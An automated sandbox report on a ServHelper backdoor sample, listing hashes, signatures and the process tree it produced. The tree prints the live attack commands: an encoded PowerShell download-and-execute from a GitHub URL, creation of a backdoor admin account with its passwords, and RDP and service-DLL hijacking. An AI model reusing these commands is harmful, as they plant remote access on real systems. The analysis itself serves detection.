Resubmissions
02-09-2021 16:57
210902-vgpzjadhhn 1002-09-2021 16:25
210902-tw1h5sage4 1002-09-2021 11:31
210902-9dk89x9wb2 1014-08-2021 13:56
210814-xdxpv1yk2x 10Analysis
-
max time kernel
1750s -
max time network
1772s -
platform
windows7_x64 -
resource
win7-en -
submitted
02-09-2021 16:25
Static task
static1
Behavioral task
behavioral1
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win7-en
Behavioral task
behavioral2
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win10v20210408
General
-
Target
472208d7ba18d4c14b7e90b9db5d6feb.exe
-
Size
5.9MB
-
MD5
472208d7ba18d4c14b7e90b9db5d6feb
-
SHA1
ff24cc43998ff99e61b1a838e1d51c4888498935
-
SHA256
ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
-
SHA512
9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 11 1176 powershell.exe 12 1176 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1352 icacls.exe 1324 icacls.exe 320 icacls.exe 1584 takeown.exe 1676 icacls.exe 1964 icacls.exe 1396 icacls.exe 844 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 844 844 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1584 takeown.exe 1676 icacls.exe 1964 icacls.exe 1396 icacls.exe 844 icacls.exe 1352 icacls.exe 1324 icacls.exe 320 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KB6Y95K1TRVJZ3LP0BBS.temp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0a4dfb417a0d701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 588 powershell.exe 560 powershell.exe 1160 powershell.exe 792 powershell.exe 588 powershell.exe 588 powershell.exe 588 powershell.exe 1176 powershell.exe -
Suspicious behavior: LoadsDriver 59 IoCs
Processes:
pid process 464 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 844 -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1996 472208d7ba18d4c14b7e90b9db5d6feb.exe Token: SeDebugPrivilege 588 powershell.exe Token: SeDebugPrivilege 560 powershell.exe Token: SeDebugPrivilege 1160 powershell.exe Token: SeDebugPrivilege 792 powershell.exe Token: SeRestorePrivilege 1964 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1724 WMIC.exe Token: SeIncreaseQuotaPrivilege 1724 WMIC.exe Token: SeAuditPrivilege 1724 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1724 WMIC.exe Token: SeIncreaseQuotaPrivilege 1724 WMIC.exe Token: SeAuditPrivilege 1724 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1188 WMIC.exe Token: SeIncreaseQuotaPrivilege 1188 WMIC.exe Token: SeAuditPrivilege 1188 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1188 WMIC.exe Token: SeIncreaseQuotaPrivilege 1188 WMIC.exe Token: SeAuditPrivilege 1188 WMIC.exe Token: SeDebugPrivilege 1176 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 1996 wrote to memory of 588 1996 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 1996 wrote to memory of 588 1996 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 1996 wrote to memory of 588 1996 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 588 wrote to memory of 1056 588 powershell.exe csc.exe PID 588 wrote to memory of 1056 588 powershell.exe csc.exe PID 588 wrote to memory of 1056 588 powershell.exe csc.exe PID 1056 wrote to memory of 936 1056 csc.exe cvtres.exe PID 1056 wrote to memory of 936 1056 csc.exe cvtres.exe PID 1056 wrote to memory of 936 1056 csc.exe cvtres.exe PID 588 wrote to memory of 560 588 powershell.exe powershell.exe PID 588 wrote to memory of 560 588 powershell.exe powershell.exe PID 588 wrote to memory of 560 588 powershell.exe powershell.exe PID 588 wrote to memory of 1160 588 powershell.exe powershell.exe PID 588 wrote to memory of 1160 588 powershell.exe powershell.exe PID 588 wrote to memory of 1160 588 powershell.exe powershell.exe PID 588 wrote to memory of 792 588 powershell.exe powershell.exe PID 588 wrote to memory of 792 588 powershell.exe powershell.exe PID 588 wrote to memory of 792 588 powershell.exe powershell.exe PID 588 wrote to memory of 1584 588 powershell.exe takeown.exe PID 588 wrote to memory of 1584 588 powershell.exe takeown.exe PID 588 wrote to memory of 1584 588 powershell.exe takeown.exe PID 588 wrote to memory of 1676 588 powershell.exe icacls.exe PID 588 wrote to memory of 1676 588 powershell.exe icacls.exe PID 588 wrote to memory of 1676 588 powershell.exe icacls.exe PID 588 wrote to memory of 1964 588 powershell.exe icacls.exe PID 588 wrote to memory of 1964 588 powershell.exe icacls.exe PID 588 wrote to memory of 1964 588 powershell.exe icacls.exe PID 588 wrote to memory of 1396 588 powershell.exe icacls.exe PID 588 wrote to memory of 1396 588 powershell.exe icacls.exe PID 588 wrote to memory of 1396 588 powershell.exe icacls.exe PID 588 wrote to memory of 844 588 powershell.exe icacls.exe PID 588 wrote to memory of 844 588 powershell.exe icacls.exe PID 588 wrote to memory of 844 588 powershell.exe icacls.exe PID 588 wrote to memory of 1352 588 powershell.exe icacls.exe PID 588 wrote to memory of 1352 588 powershell.exe icacls.exe PID 588 wrote to memory of 1352 588 powershell.exe icacls.exe PID 588 wrote to memory of 1324 588 powershell.exe icacls.exe PID 588 wrote to memory of 1324 588 powershell.exe icacls.exe PID 588 wrote to memory of 1324 588 powershell.exe icacls.exe PID 588 wrote to memory of 320 588 powershell.exe icacls.exe PID 588 wrote to memory of 320 588 powershell.exe icacls.exe PID 588 wrote to memory of 320 588 powershell.exe icacls.exe PID 588 wrote to memory of 1516 588 powershell.exe reg.exe PID 588 wrote to memory of 1516 588 powershell.exe reg.exe PID 588 wrote to memory of 1516 588 powershell.exe reg.exe PID 588 wrote to memory of 1636 588 powershell.exe reg.exe PID 588 wrote to memory of 1636 588 powershell.exe reg.exe PID 588 wrote to memory of 1636 588 powershell.exe reg.exe PID 588 wrote to memory of 1600 588 powershell.exe reg.exe PID 588 wrote to memory of 1600 588 powershell.exe reg.exe PID 588 wrote to memory of 1600 588 powershell.exe reg.exe PID 588 wrote to memory of 1812 588 powershell.exe net.exe PID 588 wrote to memory of 1812 588 powershell.exe net.exe PID 588 wrote to memory of 1812 588 powershell.exe net.exe PID 1812 wrote to memory of 936 1812 net.exe net1.exe PID 1812 wrote to memory of 936 1812 net.exe net1.exe PID 1812 wrote to memory of 936 1812 net.exe net1.exe PID 588 wrote to memory of 1580 588 powershell.exe cmd.exe PID 588 wrote to memory of 1580 588 powershell.exe cmd.exe PID 588 wrote to memory of 1580 588 powershell.exe cmd.exe PID 1580 wrote to memory of 1192 1580 cmd.exe cmd.exe PID 1580 wrote to memory of 1192 1580 cmd.exe cmd.exe PID 1580 wrote to memory of 1192 1580 cmd.exe cmd.exe PID 1192 wrote to memory of 1684 1192 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zzulzwbo.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1047.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1046.tmp"4⤵PID:936
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:792 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1584 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1676 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1964 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1396 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:844 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1352 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1324 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:320 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1516
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1636 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1600
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:936
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1584
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1676
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1092
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1380
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1092
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:780
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:316
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1600
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc iBs6lfst /add1⤵PID:2012
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc iBs6lfst /add2⤵PID:1812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc iBs6lfst /add3⤵PID:1696
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1192
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:780
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD1⤵PID:880
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD2⤵PID:676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD3⤵PID:1704
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1360
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1628
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc iBs6lfst1⤵PID:936
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc iBs6lfst2⤵PID:1524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc iBs6lfst3⤵PID:456
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:676
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1696
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1396
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes1⤵PID:1692
-
C:\Windows\system32\net.exenet user wgautilacc 1112132⤵PID:1168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 1112133⤵PID:2004
-
C:\Windows\system32\net.exenet user wgautilacc /active:yes2⤵PID:2036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc /active:yes3⤵PID:912
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
c07edee87321506129963d52adf00691
SHA1852a61e06d9781be17f7859e0fcaedaa6890046f
SHA256bfdccf4d9fe83ebebf5fb9cade82cefd977caa61594e7718f83f1ab7eb7b23d6
SHA512144cffc7d5db2f3fe4591b1089e33ffeaaf58f3854c855e0c8770e28acb098cf092fe7d417640316cd2039f4361beff3b55fd703c87ff289061ed09300e2803e
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
00fb904b2dd958760943b89400e9b7f9
SHA18c825862b6f70cbaef991525f31100f713e61e7d
SHA256392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
SHA512ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a
-
MD5
fc1fcea0e377f949ca523347a5489a06
SHA136fd47bac965a954fdd2a33133c1db4171b50d27
SHA2565f1a684fece7d66b11664497d19048947b8eacfbdb5cbaa44577ffeae500daad
SHA51260385ab361e3c359954897100050327a480e09d41e0a4113ad4f8b020b049a3b8f018451ec67640b72261b35e0c7a9b89a92b09955dde0132b3561f761a5a15c
-
MD5
6c46f8fcebd944e2bec33c0fc73af629
SHA1419a7f6fe49d69500e11df17a565dcc961723fcf
SHA256b5d600eb0b73bd27e7cb7cb9149717ee989037036cc229cbf95e36d17f5592a7
SHA5124a5d2046beb96c53e6a10da4ac0fdaa5e7be2d2f0f003f6d6081a86323a09a61ecd7fe24dabe9691144c110b0d37cb0904597141089634df2c6a0b48418bc5f7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD57870e7807fd0aa185ee82df60bcc0c92
SHA1b82913e640f225175720a885dd3e0f020c3b5cb9
SHA25657c5bab0dc0258bc54b73d032dd83dbbb82a8cf6bc2b0ea0588011518e08e166
SHA5129829c8bb325e56cc2be7eac7a5898890474ff02b79ddce4d82376b09c4f0a833cffd4a2f98d142821e1ce909b4d752b2bf561480d8cbfa02cf8c4394f580eae9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD57870e7807fd0aa185ee82df60bcc0c92
SHA1b82913e640f225175720a885dd3e0f020c3b5cb9
SHA25657c5bab0dc0258bc54b73d032dd83dbbb82a8cf6bc2b0ea0588011518e08e166
SHA5129829c8bb325e56cc2be7eac7a5898890474ff02b79ddce4d82376b09c4f0a833cffd4a2f98d142821e1ce909b4d752b2bf561480d8cbfa02cf8c4394f580eae9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD57870e7807fd0aa185ee82df60bcc0c92
SHA1b82913e640f225175720a885dd3e0f020c3b5cb9
SHA25657c5bab0dc0258bc54b73d032dd83dbbb82a8cf6bc2b0ea0588011518e08e166
SHA5129829c8bb325e56cc2be7eac7a5898890474ff02b79ddce4d82376b09c4f0a833cffd4a2f98d142821e1ce909b4d752b2bf561480d8cbfa02cf8c4394f580eae9
-
MD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
37cbf8ed51ff6f9ead6d150889a98d7c
SHA100b86c549fa7ed97eb8be0bbef026d40a3d09864
SHA2565e6f61e1e5293527e39494a00c5a80f0148fc285b3781918f357f5118ce3db58
SHA51266ba96a6c7c1dcfcd62fd7942d9b3c7f8de49abd6444c50d2119d2527c63812eff1c97649842223655f60d14ce993df21719ff24f1e1d73411b020f531c6fc44
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
4f15d7369bef139b87503b52293f6cfd
SHA1e9d94c6b9a2d5bfa098e634942aab3280a3a6b68
SHA2568b3a6bd136a7d060633dfc4710848b91372a526293ae3a62e2d22bec42203538
SHA5126fb2b764f35b1d0aaa2c93af056536802fa4c1f2a3dcdefe6886948e8141edf66a54b28151dfb7ebb15965ecc1d6be98110c217ae836d654a18656d0546f5a13
-
MD5
b110f38845e18a04ab59a7d8a134ef40
SHA18119030034e6fbe62d875e824b5233c1f29d61a0
SHA2561cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
SHA51280eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223
-
MD5
5768a809b9fcbff117dffa8cbf2e8852
SHA1a056e76d15bc7509d0361175b2ae4ba348460cd6
SHA2568ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
SHA51299d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b